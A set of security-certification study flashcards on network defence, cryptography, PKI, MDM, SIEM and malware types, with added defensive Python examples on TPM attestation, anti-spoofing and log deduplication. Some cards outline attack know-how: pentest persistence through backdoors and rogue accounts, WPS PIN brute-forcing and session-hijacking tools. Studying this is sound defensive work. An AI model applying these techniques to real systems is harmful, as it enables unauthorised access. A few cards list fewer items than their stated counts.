Somewhere you are examples (2)

IP address. Geolocation.

Examples of changes done to Master Image before deploying (3)

IP addresses. Firewall rules. Licensing updates.

Corrective examples (3)

IPS can block an attacker. Backups can mitigate a ransomware infection. A backup site can provide options during a storm. (Corrective control examples.)

Anomaly-based

IPS/IDS creates a baseline for normal traffic flow and identifies malicious traffic based on what doesn't match the normal flow

Heuristics

IPS/IDS identifies traffic based on certain characteristics. Uses artificial intelligence.

Inline monitoring

IPS/IDS sits inline with all traffic passing through it before being allowed or denied

AAA framework (4)

Identification, Authentication, Authorization, and Accounting

Spanning Tree Protocol (2)

Identifies and prevents loops on switched networks by using blocked ports. Also prevents downtime by changing bridge configuration when a path is down.

Transitive Trust

If Domain A trusts Domain B, Domain B trusts Domain C, then Domain A trusts Domain C.

If a hurricane destroys the organization's building and there are no backups to keep it running, what main impact would this affect?

Impact: Reputation (example)

Where can a Cloud access security broker be integrated? (3)

Implemented as client software, local security appliances, or cloud-based.

WPA history (2)

In 2002, it was a short-term replacement for WEP and its serious cryptographic weaknesses. TKIP had vulnerabilities and was deprecated in the 802.11-2012 standard.

Securing network address allocation against rogue DHCP servers (3)

In AD, DHCP servers must be authorized. Some switches can be configured with "trusted" interfaces that allow DHCP distribution. Cisco calls this DHCP Snooping.

Fire suppression (2)

In data centers, uses chemicals like (DuPont) FM-200. Can detect with a smoke, flame, or heat detector.

covertext

In Steganography, the container document or file that contains hidden info

Firewall: ACL (4)

In firewalls, a set of rules that allow or deny traffic based on tuples. Rules are evaluated from top to bottom and can be general or specific. At the bottom of the list is an implicit deny if no rules are matched.

Untrained users (3)

In-person training may be time-consuming and expensive, but it is critical to security and likely less expensive than a breach. Should be reinforced annually with tests and scenarios.

Functional security tests

In secure automation, checks that everything can log in and log out properly, and ensures the platform everything is running on is secure.

Where and for whom is the information gathered by the privacy impact assessment available?

In the written privacy statement available to the users.

Roles and responsibilities (for Incident Response) (7)

Incident response team. IT security management. Compliance officers. Technical staff (help from the trenches). User community. Legal team. Public relations. Etc.

Web server providers are an example of which cloud deployment model?

Infrastructure as a Service example

Internal threats

Insiders

SSL Accelerators are often integrated into which devices?

Integrated into load balancers

Cloud access security broker

Integrated to provide security policies to cloud-based applications.

Agentless NAC (3)

Integrated with Active Directory. Checks are made during login and logoff. Can't be scheduled

Man-made threats

Internal or external threats

Common Criteria for Information Technology Security Evaluation (4)

International standard that designates what security controls are implemented in an OS. Common reference for the US Federal Government. ISO/IEC 15408. Security control level referenced as EAL.

Secure Guest topology (2)

Internet access with no internal network access. Integrate captive portal.

what are cloud-based methods to mitigate DDoS? (2)

Internet provider or reverse proxies

(Account management) Account maintenance (3)

Involves: initial provisioning with standard password management and group and permission assignment; periodic password updates and permission audits; during off-boarding, disabling accounts and archiving user documents and encryption keys.

Where is ANT/ANT+ most commonly used? (2 eg)

IoT devices such as fitness devices and heart rate monitors

Sandboxing

Isolated testing environment with no connection to the real world or production system.

How does HIDS/HIPS deal with encrypted data

It deals with decrypted data since it sits on our desktop

What kind of wireless service is ANT? (2)

It's neither 802.11 nor Bluetooth. It's its own separate wireless service.

Password cracker tools (3)

John the Ripper, Ophcrack, or cloud-based tools paired with rainbow tables.

When did development of NTPsec begin?

June of 2015

fighting keyloggers (3)

Keep Antivirus/Anti-malware updated for prevention. Block unauthorized exfiltration at the firewall/monitoring software. Run standalone keylogging scanner

Fighting Botnet Malware (5)

Keep Antivirus/Anti-malware updated for prevention. Patch applications and OS. Run deep scans regularly. Monitor traffic. Host-based firewalls/IPS can block the Command and control center.

Protect against adware/spyware (4)

Keep Antivirus/Anti-malware updated for prevention. Watch what you install. Backups. Run different specialized scans on top of antivirus, e.g. Malwarebytes.

How to fight rootkits (3)

Keep Antivirus/Anti-malware updated for prevention. UEFI's Secure Boot prevents installation into the OS. For removal, a very specific rootkit remover is needed.

Single sign-on options (2)

Kerberos for Windows. 3rd-party options.

Key management life cycle (6)

Key generation. Certificate generation. Distribution. Storage. Revocation. Expiration.

Key stretching aka

Key strengthening (aka)

PBKDF2

Key stretching library that is part of RSA public key cryptography standards

BCRYPT

Key stretching library that uses the Blowfish cipher to perform multiple rounds of hashing for passwords.

Examples of things with EMI leakage (4)

Keyboards, hard drives, network connections, video

secure protocol(s) for Directory services

LDAPS (non-standard), SASL

what layer is an AP?

Layer 2, since it's a bridge.

Reasons for IP spoofing (4)

Legitimate: Load balancing. Load testing. Malicious: ARP Poisoning. DNS amplification/DDoS

MAC filtering in AP (3)

Lets you limit which physical hardware addresses can get onto the network. Keeps neighbors out. But it is easy to capture packets, find which MACs are allowed, and spoof a MAC address with free open-source software.

Virtualization Segmentation (2)

Lets you separate networks in a virtual environment. Add routers and firewalls with the click of a button.

LWAPP stands for

Lightweight Access Point Protocol

EAP-FAST (2)

Lightweight and secure authentication protocol. Cisco's proposal to replace LEAP (used on WEP)

False rejection rate (FRR)

Likelihood that the biometrics of an authorized user will be rejected

Which device can perform health checks on servers?

Load balancer

X.500 Attribute L

Locality. Usually a city or area

Rack security (3)

Locks. Fences and gates.

Collision example in 1996

MD5

full device encryption security

MDM backs up the keys to decrypt the devices.

best practice with third-party app stores (3)

MDM can disable/enable access to an app store, or set up a whitelist for apps. Deny any apps that are not business-appropriate.

SMS/MMS security (2)

MDM can enable or disable this completely, or only during certain times or at certain locations.

screen lock security (2)

MDM can force password requirements. Can set policies for failed attempts.

Password and PIN security (2)

MDM can initiate recovery process, usually a question. MDM can also decide level of security

Firmware OTA updates security

MDM can manage and push out updates after testing what effect they have on company applications.

Mobile content management

MDM can secure access to data by managing the DLP on on-site content (e.g. Microsoft Sharepoint, file servers) and cloud-based storage

Mobile device Recording microphone security

MDM: disable or geo-fence

Ettercap (3)

MITM software. Set the targets as the IP addresses of the router and the host to monitor. Captures caches.

Most recent Microsoft implementation of CHAP

MS-CHAP v2

Web-of-trust model (2)

Makes everyone an authority. Alternative to PKI.

(penetration testing concepts) Persistence (4)

Making sure to stay in the system once exploited. Set up a backdoor. Build user accounts to log in normally. Change or verify default passwords.

Behavior-based

Malicious action identified by the IPS/IDS based on certain actions like deleting files or changing server configurations

False Negative

Malicious traffic that is missed by the IPS/IDS

Signature-based

Malicious traffic that matches specific predefined signatures stored on IPS/IDS

Security incidents examples (documented types?) (4)

Malware on email attachments. DDoS attack from Botnet. Insiders steal info. User installs peer-to-peer software that allows external access to data.

Virus (2)

Malware that can replicate itself through a computer, file systems and the network by running an executable. Some run very simple functions and seem invisible.

Rootkits (3)

Malware that modifies the kernel of the OS to avoid being detected by antivirus/anti-malware. Often combined with other malware. It's invisible to the OS, Task Manager, and antivirus/anti-malware.

Trojan Horse

Malware that pretends to be harmless to make users run it.

Keylogger (2)

Malware that records keystrokes to a file and sends it to the bad guys. Can also log and send clipboard contents, screenshots, instant messaging, and search engine queries.

Spyware (3)

Malware that spies on you. Often steals personal info used for fraud or for clearing out bank accounts. May install keyloggers.

Botnet (2)

Malware that waits on a command and control center for further instructions. Many work together, usually for DDoS. Can be rented for this purpose.

The patching process (4)

Manage centrally: pick which patches to install, usually security-related patches. Test patches. Tell the management server when to deploy.

Improper certificate and key management (4)

Management should be planned and documented: kind of CA; CA content protection; how intermediate CAs will be created and managed; the certificate validation and signing process.

Alternate business practices examples (3)

Manual transactions. Paper receipts. non-automated phone calls for transaction approvals.

WiFi-enabled MicroSD cards security

Manufacturer should implement strong security including security control to the API.

How is spyware usually installed

May be installed alongside other software or as fake security software.

Requirements for hypervisor to use virtualization

May need a CPU that supports virtualization

Special purpose embedded devices (3)

Medical devices. Vehicles. Aircraft/UAV

RADIUS Federation (2)

Members of one organization can authenticate to the network of another organization. Use their normal credentials.

vulnerability scanner tools (3)

Microsoft Baseline Security Analyzer, Tenable Nessus, Nikto (web-based type)

Built-in FDE into OS (3)

Microsoft BitLocker. Apple FileVault. Linux Unified Key Setup (LUKS).

Examples of on-site data storage (2)

Microsoft Sharepoint, file servers

Windows similar PKCS #12 format (2)

Microsoft's .pfx format. Often referenced interchangeably

application servers aka

Middleware

Identify vulnerability best practice

Might be a good idea to work with the vulnerability detection manufacturer so they can update the scan for your specific environment.

RAID 1 (3)

Mirroring. Duplicates data for fault tolerance. Requires twice the disk space.

low power devices (for cryptography)

Mobile Devices, portable systems that use less power by using: Smaller symmetric key sizes. Elliptic curve cryptography (ECC) for asymmetric encryption

DSA

Modifies Diffie-Hellman key exchange for digital signature use.

Why adware and spyware are such common malware (3)

Money: steals bank info and personal info for identity fraud. Makes money with their ads. Uses your bandwidth, e.g. to mine cryptocurrency.

Places that announce exploits (2)

Monthly Microsoft patch release, Adobe Flash update

What is the most common protocol use of IPSec?

Most use both AH and ESP together.

carrier unlocking security issues (2)

Moving to another carrier can circumvent MDM. Preventing SIM unlock may not be possible on a personal device.

(Account management) Group-based access control (2)

Moving users between groups can set account privileges based on the group. Being in multiple groups can add on permissions.

Removing Single point of failures examples (6)

Multiple/backup/redundant: internet providers; network infrastructure devices (routers, switches); servers; power sources; cooling devices/systems; groups of people in different locations.

What minimizes the impact of IPv4 shortage?

NAT use

how to prevent vulnerabilities (3)

NIST National Vulnerability Database: http://nvd.nist.gov. Perform regular scans with updated signatures. Watch the news: trade magazines, publication websites.

SHA created by

NSA (created this)

Most common NTLM seen today

NT LAN Manager v2 challenge/response

Old and New authentication method on Windows

NTLM. Today the standard is Kerberos.

secure protocol(s) for time synchronization

NTPsec

PII examples (4)

Name. Date of birth. Mother's maiden name. Biometric info. (An example of data sensitivity labeling.)

Model Validation (2)

Near the end of development, verify whether the original requirements were met and the right product is being built.

Model verification (3)

Near the end of development, verify whether the software is working properly, whether there are any bugs to address, and whether the product is being built right.

Rainbow tables examples

Need different tables for different hash methods, e.g. Windows tables differ from MySQL tables.

Standard operating procedure concerns (2)

Need to be well documented. Some must comply with industry regulations.

OS Types (6)

Network. Server. Workstation. Appliance. Kiosk. Mobile OS.

Steganography tools (techniques) (3)

Network-based: hide messages in TCP packets. Image-based: embed a message, invisible watermarks. Yellow dots from a printer can be used to tell which printer was used to print a document, as well as the date and time it was printed.

Examples of times to use proper error handling (3)

Network connection disappears or fails. Server failure. Database unavailable.

How to spot a rogue system on your network (2)

Network scanner. Hard to hide from a layer 2 ARP scan.

ways to capture data for replay attacks (3)

Network tap, ARP poisoning, 3rd party software to capture packets.

GCM uses (4)

Network traffic security, e.g. wireless, IPsec. Web server encryption, e.g. SSH, TLS.

Data-in-transit security (4)

Network-based: Firewalls, IPS. Encryption: TLS, IPsec.

low latency (for cryptography)

Networks needing fast computation time use: symmetric encryption, smaller key sizes.

fighting XSS (4)

Never click untrusted links in emails, texts, comments, etc. Disable JavaScript (although this would prevent many websites from working). Keep browsers and applications updated. Have developers validate input.

fighting impersonation (3)

Never disclose personal or company info. Verify through 3rd parties who they are. You can call back.

IPsec AH ESP Tunnel mode

New IP Header/AH Header/ESP Header/IP Header/Data/ESP Trailer/Integrity Check Value

Cryptomalware (2)

New generation of ransomware that encrypts all files excluding the OS, so it can still show a message on whom to pay and how. It also usually encrypts online backups.

Nmap add-on

Nmap scripting engine (NSE): extend capabilities, vulnerability scans

Name of Network scanners (2)

Nmap/Zenmap, Angry IP Scanner

secure protocol(s) for Network address allocation

No "secure" version of DHCP. Can be secured with DHCP snooping and by limiting MAC addresses per interface.

Open system

No authentication password is required

Misconfigured AP (2)

No encryption. Wireless access that allows remote management of the device.

OCSP concerns (2)

Not all browsers/apps support it, e.g. early Internet Explorer versions. Some support it but don't bother checking revocation.

RC4 uses

Not used. WPA2 moved to AES instead.

Mandatory Access Control (MAC) (2)

OS limits user access to objects by setting labels on the objects to decide their clearance level. Administrator decides who gets access to what security level.

Evaluation Assurance Level

OS trust level from lowest, EAL1, to highest, EAL7.

What are a few things configuration compliance scanners may check? (5)

OS version, installed applications, network settings, anti-virus/anti-malware settings and versions, server configurations, etc

security concerns with SATCOM (3)

OS vulnerabilities. Remote code execution. Similar security issues to smartphones.

RTOS (ie)

OS with a deterministic processing schedule managing non-trivial systems. Doesn't wait on other processes.

Different software licenses (3 ie, 1)

OS, applications, hardware appliances: each has different methods of licensing.

Modern malware that encrypts itself until it executes is an example of which cryptography use case?

Obfuscation (Common use cases example)

How is adware usually installed

Often included alongside other software installations.

Amplification (2)

Often used with DDoS: small requests are reflected off other services or devices to create a bigger attack. Takes advantage of protocols with little/no authentication or checks: NTP, DNS, ICMP.

Implicit deny

On a firewall ACL, if traffic matches no rules, there is a final invisible rule that denies that traffic even if it wasn't added by the user.

Remote access VPN (2)

On-demand access from a remote device to a VPN concentrator; some are configured as always-on.

Uses for Captive portal

On guest networks, avoids unauthorized use of network and keeps employees off this network.

Resource vs. security constraints (3)

Ongoing battle. Browser support vs. supported encryption: make sure the browser supports the encryption type. VPN software support vs. supported algorithms: make sure the VPN concentrator can support the clients being installed on workstations.

Data sanitation tools (4)

One overwrite is enough to make data unrecoverable. Entire hard drives: DBAN. Individual files or folders: Microsoft SDelete. Delete all caches and temporary files, including copies in caches.

Fighting IP spoofing (3)

Only a certain range of IPs should be associated with a subnet. Apply firewall rules to prevent invalid traffic. Enable switch security.

SAML (3)

Open standard for authentication and authorization. Authenticate through a third-party to gain access to local resources. XML based markup language

OAuth usually combines with

OpenID which handles the SSO authentication

Database security (4)

Options: may have access control around usernames, passwords, and permissions. Can encrypt everything or individual fields. Data integrity prevents data loss due to server or hardware problems. A well-written application can prevent SQL injection and other unauthorized access to data.

X.500 Attribute OU

Organizational Unit. A unit or department within the organization

Process Management

Organizing the IT "product" to work best with the organization.

IPSec Transport mode (2)

Original packet: IP Header/Data. Transport mode: IP Header/IPsec Header/Data/IPsec Trailer. The IPsec header and trailer encrypt the data.

IPSec Tunnel mode (2)

Original packet: IP Header/Data. Tunnel mode: New IP Header/IPsec Header/IP Header/Data/IPsec Trailer. The destination and the data are encrypted.

Methods of Key exchange (5)

Out-of-band: Telephone, courier, in-person. In-band: Additional encryption, asymmetric encryption

Example of mandated segmentation

PCI compliance

PEAP implementations (3)

PEAPv0/EAP-MSCHAPv2, which authenticates to Microsoft's MSCHAPv2 databases.

Strong algorithm examples (2)

PGP, AES

Web of trust example

PGP (digital signature signing example)

Ways to connect to WPS (4)

PIN on the AP. Push button on AP. NFC. USB (not used anymore)

WPS attacks (4)

The PIN was an 8-digit number that validated the first 4 digits (10,000 possibilities), then the next 3 digits (1,000); the last digit was a checksum, for a total of 11,000 possible combinations. Used to have no slowdowns or lockouts. Walk up to the access point. Pixie Dust: a poorly encrypted PIN can be received and brute-forced offline in less than 30 minutes.

Who digitally signs public key certificates?

PKI uses a CA to sign. Web of trust uses other users.

Means of Session Hijacking (4)

Packet capture: Wireshark, Kismet (over the air). Exploits: cross-site scripting. After the session ID is captured, modify headers: Tamper, Firesheep, Scapy. Modify cookies: Cookies Manager+ (Firefox add-on).

Control Plane

Part of SDN that's responsible for the configuration of the device.

data plane

Part of SDN that's responsible for the hard work, i.e. forwarding frames or providing firewall functionality.

Secure Boot

Part of the UEFI specification that has a set of known-good digital signatures; the OS is allowed to boot only if it matches those signatures.

Different types of vulnerability exploits (4 eg)

Password brute-force. Social engineering. Database injections. Buffer overflows

Something you know examples (3)

Password. PIN. Pattern

Concern with patching OS

Patches can introduce problems with the OS or applications on the OS.

Security as a service (2)

Pay for the security you need in the cloud. Scale up and down as needed.

Reasons to Segment networks (4)

Performance. Security. Compliance, which also makes change control easier.

Advantage of a Tabletop exercise (2)

Performing a full-scale disaster drill can be costly. Many of the logistics can be determined through analysis rather than a physical drill.

PKCS #12 standard and development

Personal Information Exchange Syntax Standard. Developed by RSA Security. Now an RFC standard.

Vishing

Phishing over the phone.

control diversity (for defense in depth) (3)

Physical. Administrative. Technical

Segmentation types (4)

Physical. Logical (VLAN). Virtualization. Air gaps.

Backdoors (2)

Placed on your computer through malware to allow other malware to install. Some software has these as unknown vulnerabilities.

SalesForce.com offers which cloud deployment model?

Platform as a service

Administrative controls (2 eg)

Policies and procedures everyone must follow, e.g. onboarding and offboarding visitors, backup media handling

Key management (3)

Policies for: protecting physical and digital keys, key generation, and key breaches (unauthorized access to keys)

Some personnel issues (5)

Policy violation. Insider threat. Social engineering. Social media. Personal email

IEEE 802.1x aka

Port-based Network Access Control (NAC) (aka)

Lessons learned (5)

Post-incident meeting. Hold it while memory of the incident is fresh. Find out what happened. Evaluate and fix incident response plans. Evaluate and add precursors (indicators that warn of a coming incident).

Things VPN can check for Baseline deviation (3)

Posture assessment checks: antivirus version, signature version, OS patches

SCADA/ICS examples (3)

Power generation. refining. manufacturing equipment

Principles of social engineering: Authority (ie)

Pretends to be in charge or in a high position, e.g. CEO, help desk, police

Remote attestation security (2)

The device reports its boot measurements to a verifier, which compares them with a previously recorded inventory; a device whose measurements changed can be refused (kept from booting or from joining the network). Because the measurements are taken in hardware before the OS loads, a change is detected before an infected OS gets a chance to hide it.
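An added example, not part of the original card set, modelling how a TPM platform configuration register (PCR) accumulates boot measurements and how a verifier compares the result with a golden value. The boot component images are constructed stand-ins, and the signing of the reported value by the TPM's attestation key is left out.

```python
import hashlib
import hmac

# Added example (not from the original card set). A PCR can only be "extended":
# PCR_new = SHA-256(PCR_old || measurement). The final value therefore depends on
# every component measured and on their order, and cannot be set directly.

PCR_SIZE = 32  # SHA-256 bank


def pcr_extend(pcr: bytes, measurement: bytes) -> bytes:
    return hashlib.sha256(pcr + measurement).digest()


def measure_boot(components):
    """Measure each (name, image bytes) into a PCR. Returns the final PCR value
    and an event log like the one TPM-aware firmware keeps for the verifier."""
    pcr = bytes(PCR_SIZE)  # PCRs start at all zeros at power-on
    event_log = []
    for name, image in components:
        digest = hashlib.sha256(image).digest()
        pcr = pcr_extend(pcr, digest)
        event_log.append((name, digest.hex()))
    return pcr, event_log


# Constructed stand-ins for real firmware, bootloader and kernel images.
GOLDEN_BOOT = [
    ("firmware", b"uefi-firmware-v1.2"),
    ("bootloader", b"shim+grub-signed"),
    ("kernel", b"vmlinuz-5.15-signed"),
]
GOLDEN_PCR, _ = measure_boot(GOLDEN_BOOT)  # recorded once, at enrollment


def attest(reported_pcr: bytes, expected_pcr: bytes = GOLDEN_PCR) -> str:
    """Verifier decision: admit the device only if its boot matches the inventory."""
    if hmac.compare_digest(reported_pcr, expected_pcr):
        return "ADMIT"
    return "QUARANTINE"


def check_device(components) -> str:
    reported, _ = measure_boot(components)
    return attest(reported)


if __name__ == "__main__":
    tampered = list(GOLDEN_BOOT)
    tampered[2] = ("kernel", b"vmlinuz-5.15-signed" + b"\x00bootkit")
    print("golden boot  :", check_device(GOLDEN_BOOT))
    print("patched kernel:", check_device(tampered))
```

The verifier learns only that something in the chain differs, not which component; the event log is what lets it narrow that down, and the log is trustworthy only because replaying it must reproduce the hardware-held PCR value.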

Anti-spoofing on routers (3)

Prevents attackers from using someone else's address for MITM, DDoS, etc. by: filtering reserved source addresses, such as the RFC 1918 ranges, with an ACL; enabling Reverse Path Forwarding (RPF) checks

CER (3)

Primarily a Windows X.509 file extension. Can be encoded in binary DER format or in Base64 (PEM) ASCII. Usually contains a certificate (the public key and identity), not the private key.

Types of virus (4)

Program virus. Boot sector virus. Script virus. Macro virus

Reason for Access violations (2)

Programming problem: the application is pointing to the wrong part of memory. Security problem: malware or a third-party application attempting to access restricted memory, e.g. to cause a DoS

NULL Pointer dereference (3)

A pointer is a reference to a portion of memory. If the reference points to nothing (NULL) and the program dereferences it: application crash, debug information displayed, DoS

Places collectors can gather data to (4)

Proprietary consoles, e.g. IPS and firewall consoles. SIEM consoles, which have a correlation engine to compare diverse sensor data. Syslog servers

what data is often unique to an organization?

Proprietary data

Protected distribution aka (2)

Protected distribution system. (PDS) Protected cabling

ESP

Provides encryption (and integrity) for IPsec. MD5, SHA-1 or SHA-2 for the integrity hash; 3DES or AES for encryption. Tunnel-mode packet layout: new IP header / ESP header / original IP header / data / ESP trailer / Integrity Check Value

SFTP (2)

Provides file transfers over SSH. Provides file system functionality.

Authentication (2)

Proving you are who you say you are. Done with passwords and other factors.

Provisioning when deploying an application (5)

Provision the web server, database server, middleware server, user workstation configurations, certificate updates, etc.

Transparent proxy

Proxies that are invisible to users; no additional client configuration is needed to take advantage of the proxy

Described as contactless smart cards

Proximity cards (description)

Microsoft and amazon cloud-based offering an example of which cloud deployment model?

Public cloud deployment model

(Digital certificate) Public Key

Public key and algorithm used by the certificate holder. (e.g. RSA, ECC(256 bits))

Asymmetric algorithm aka

Public key cryptography (aka)

S/MIME

Public key encryption and digital signing of mail content.

Distributed allocation

Puts critical assets, data and other systems in different locations so that it is harder to target and exploit a single application instance.

Who would usually use sandboxing for code quality and testing and what would they test? (4)

QA: they can fuzz, overload, stress test and try to break the environment without having to worry about harming production.

access database examples for IEEE 802.1x (3)

RADIUS, LDAP, TACACS+

Combined RAID types and why?

RAID 0+1, RAID 1+0, RAID 5+1, etc. Combining levels increases redundancy (and performance).

CAPWAP (2)

RFC open standard (RFC 5415) for managing WAPs from wireless LAN controllers. Based on LWAPP

versions of RIPEMD

RIPEMD-128. RIPEMD-160. RIPEMD-256. RIPEMD-320

secure version of RIPEMD

RIPEMD-160 (the original RIPEMD had collision weaknesses; no practical collisions are known for RIPEMD-160)

Motion detection alarms (2)

Radio (microwave) reflection or passive infrared. Useful in areas not often in use

Compensating examples

Re-image or restore from backup. Hot site. Backup power system (control examples)

Ways to provide redundancy and fault tolerance (5)

Redundant hardware components (e.g. multiple devices). RAID. UPS. Server clustering. Load balancing

RAT aka

Remote Administration Tool

DarkComet

Remote access Trojan with many features, including a keylogger that captures all keystrokes

NFC Security Concerns (4)

Remote capture from up to about 10 meters. Frequency jamming. Replay/MITM if not encrypted. A stolen or lost device can be used to make payments or gain access

After-action reports (4)

Report after an exercise detailing: exercise scope and recovery objectives; methodology; what did and didn't work; updates to procedures and tools.

Example of waterfall development (6)

Requirements, analysis, design, coding, testing, operations (hand-off to the operations team, which adds it to the production environment)

what is needed for emails to use S/MIME

Requires a PKI or a similar means to manage and provide keys.

Criteria examples for Attribute-based access control(6)

Resource info, IP address, time of day, desired action, geographical location, relationship to the data, etc

Data steward (3)

Responsible for data accuracy, privacy, and security. Assigns sensitivity labels to the data. Ensures compliance with any applicable laws and standards for the data

Important physical signs (5)

Restricted areas. Fire exits. Warning signs, e.g. chemical, construction. Medical resources. Information, e.g. the number to call for emergencies

how does SFTP provide file management (3)

Resumes interrupted transfers, directory listings, remote file removal, etc.

Data roles

Roles with access to data based on their responsibility in the organization.

Reverse Path Forwarding (RPF) (2)

Router feature that checks that a packet's source address is reachable through the interface the packet arrived on (i.e. a reply would go back out the same way); otherwise the packet is dropped. Anti-spoofing measure
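An added example, not part of the original card set, that implements both anti-spoofing checks from the "Anti-spoofing on routers" and "Reverse Path Forwarding" cards: a bogon ACL on the external interface and a unicast RPF check against a routing table. The interface names, prefixes and routes are constructed for illustration.

```python
import ipaddress

# Added example (not from the original card set): ingress anti-spoofing as an
# edge router would apply it. Routes and interface names are constructed.

# Sources that must never arrive from the internet side.
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4",
)]

# Constructed routing table: prefix -> interface used to reach it.
ROUTES = [(ipaddress.ip_network(p), ifc) for p, ifc in (
    ("203.0.113.0/24", "lan0"),
    ("198.51.100.0/24", "lan1"),
    ("0.0.0.0/0", "wan0"),
)]


def best_route(addr):
    """Longest-prefix match: (prefix length, interface) a reply to addr would use."""
    return max((net.prefixlen, ifc) for net, ifc in ROUTES if addr in net)


def ingress_check(src_ip: str, arrived_on: str, urpf_mode: str = "strict"):
    """Return (verdict, reason) for a packet with source src_ip arriving on arrived_on."""
    src = ipaddress.ip_address(src_ip)

    # Check 1: static ACL. Private/reserved sources are legitimate inside, never outside.
    if arrived_on == "wan0":
        for bogon in BOGONS:
            if src in bogon:
                return ("DROP", f"bogon source {src} ({bogon}) on {arrived_on}")

    # Check 2: unicast RPF.
    #   strict: the source must be reachable via the arrival interface.
    #   loose : any route other than the default is enough (for asymmetric paths).
    prefixlen, via = best_route(src)
    if urpf_mode == "strict" and via != arrived_on:
        return ("DROP", f"uRPF strict: {src} is routed via {via}, arrived on {arrived_on}")
    if urpf_mode == "loose" and prefixlen == 0:
        return ("DROP", f"uRPF loose: no specific route back to {src}")
    return ("ACCEPT", f"{src} on {arrived_on}")


if __name__ == "__main__":
    for pkt in (("192.168.1.10", "wan0"), ("203.0.113.5", "wan0"),
                ("203.0.113.5", "lan0"), ("8.8.8.8", "wan0")):
        print(pkt, "->", ingress_check(*pkt))
```

Strict mode is right on single-homed customer edges; on multi-homed links where traffic legitimately returns on a different interface, loose mode is what keeps the check from dropping real traffic.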

secure protocol(s) for Email (3)

S/MIME. STARTTLS on POP3 and IMAP. SSL/TLS

WiFi-enabled MicroSD cards

SD flash storage device that allows 802.11 Wifi file transfers from a camera to a computer without removing the card.

secure protocol(s) for routers and switches

SSH. SNMPv3. HTTPS (from a browser)

SIEM security reports

SIEM built-in feature that compiles a week's or even a month's worth of collected data into a single graphical view.

(SIEM data) correlation (eg)

SIEM feature that correlates events from different devices on the network, e.g. seeing someone log in through the firewall and then access information on a server

log aggregation (7 eg)

SIEM feature that logs all info from many different devices on the network to one place: switches, routers, firewalls, servers, desktops, laptops, mobile devices, etc

Event deduplication (3)

SIEM feature that keeps duplicates of an event from filling the logs, so analysts can focus on the real security event. Flapping (e.g. an interface going up and down repeatedly) is handled with timers: the SIEM counts how often the event occurred within the window and writes it as a single event that occurred N times. SIEMs allow configurable suppression and define how events are handled, which is useful for automated responses

Automated alerting and triggers (2)

SIEMs can be configured to alert on and respond to certain events (e.g. send a text, call or email; automatically open a ticket; reboot a device). Users can mark exceptions and record them in the log
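An added example, not part of the original card set, covering the two cards above: a suppression-timer deduplication of a flapping interface and a threshold-based alert trigger, run over constructed syslog lines. The host and interface names are made up.

```python
import re
from datetime import datetime

# Added example (not from the original card set). Constructed syslog lines:
# a flapping switch port, one firewall deny, and a later repeat of the port event.
LOG_LINES = """\
2024-03-01T10:00:01 sw-core1 IF Gi1/0/7 link down
2024-03-01T10:00:03 sw-core1 IF Gi1/0/7 link up
2024-03-01T10:00:04 sw-core1 IF Gi1/0/7 link down
2024-03-01T10:00:06 sw-core1 IF Gi1/0/7 link up
2024-03-01T10:00:07 sw-core1 IF Gi1/0/7 link down
2024-03-01T10:00:09 fw-edge1 DENY 198.51.100.7 -> 10.0.0.5:22
2024-03-01T10:05:30 sw-core1 IF Gi1/0/7 link down
""".splitlines()

LINE_RE = re.compile(r"^(\S+) (\S+) (.+)$")


def parse(line):
    ts, host, msg = LINE_RE.match(line).groups()
    return datetime.fromisoformat(ts), host, msg


def deduplicate(lines, window_seconds=60):
    """Collapse identical (host, message) events seen within window_seconds of
    the first occurrence into one record with a count, as a suppression timer does.
    Lines are sorted by their ISO timestamp prefix so out-of-order delivery is fine."""
    open_events = {}  # (host, msg) -> record whose window is still open
    records = []
    for line in sorted(lines):
        ts, host, msg = parse(line)
        key = (host, msg)
        rec = open_events.get(key)
        if rec and (ts - rec["first"]).total_seconds() <= window_seconds:
            rec["count"] += 1
            rec["last"] = ts
        else:
            rec = {"host": host, "message": msg, "first": ts, "last": ts, "count": 1}
            open_events[key] = rec
            records.append(rec)
    return records


def flapping_alerts(records, threshold=3):
    """Trigger: a link-state message repeated at least `threshold` times in one window."""
    return [r for r in records if "link" in r["message"] and r["count"] >= threshold]


if __name__ == "__main__":
    recs = deduplicate(LOG_LINES)
    for r in recs:
        print(f"{r['host']:9} x{r['count']:<2} {r['message']}  ({r['first'].time()}..{r['last'].time()})")
    for a in flapping_alerts(recs):
        print("ALERT: port flapping on", a["host"], a["message"])
```

Seven raw lines become four records; only the burst of three "link down" events in one minute crosses the alert threshold, while the isolated repeat five minutes later starts a fresh window and stays quiet.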

compliance mandates for off-site backups (3)

SOX. Federal Information Security Management Act (FISMA). HIPAA

secure protocol(s) for voice and video

SRTP

secure protocol(s) for Remote access

SSH

Domain validation (DV) (2)

SSL/TLS certificate issued to someone who has demonstrated some control over a DNS domain, as confirmed by the CA

Extended validation (EV) (2)

SSL/TLS certificate with additional checks to verify the certificate owner's identity. Historically displayed as a green organization name in the browser address bar (modern browsers no longer show this).

secure protocol(s) for Web

SSL/TLS = HTTPS

Cloud deployment models (7)

SaaS. PaaS. IaaS. Private. Public. Hybrid. Community

example of a safe Containment of an incident

Sandboxes can contain an incident: the suspect file or system is isolated and observed without letting it reach production.

Stages of deployment (5)

Sandboxing. Environments: development, test, staging, production

Examples of Regulatory Frameworks (3)

Sarbanes-Oxley Act. (SOX) Health Insurance Portability and Accountability Act. (HIPAA) Gramm-Leach-Bliley Act (GLBA)

Purging examples

SDelete (Sysinternals). DBAN

Fighting Dumpster Diving (3)

Secure the garbage area with a fence and lock. Shred, burn or pulp documents. Look through the trash to see whether there's sensitive material; consider training users if there is

File system security (3)

Security provided for files by most OSes. Uses ACLs: lists of groups or users that are assigned rights and permissions to particular files. Access is granted by the file owner or administered centrally. Can have built-in encryption

Substitution Cipher

Classical cipher that substitutes one letter for another. Security through obscurity; easily broken with frequency analysis

Single sign-on security

Seems to require only a username and password, but a lot of cryptography happens behind the scenes.

What Out-of-band response does passive monitoring IPS send?

Sends TCP reset (RST) segments to tear down the connection

Security provided by segmenting a network (eg)

Separates who gets access to certain networks, e.g. users should not communicate directly with database servers

Hosted (Infrastructure) (2)

Servers are not in your building and are likely owned by someone else. Usually in a specialized computing environment

Types of updates for patch management (3)

Service packs (large sets of updates). Monthly updates. Emergency out-of-band updates

Privileged accounts security (3)

Should not be used for everyday, non-administrative work. Highly secured with strong passwords and MFA. Scheduled password changes

New threats/zero day best practice

Patch fast, sometimes with little to no testing

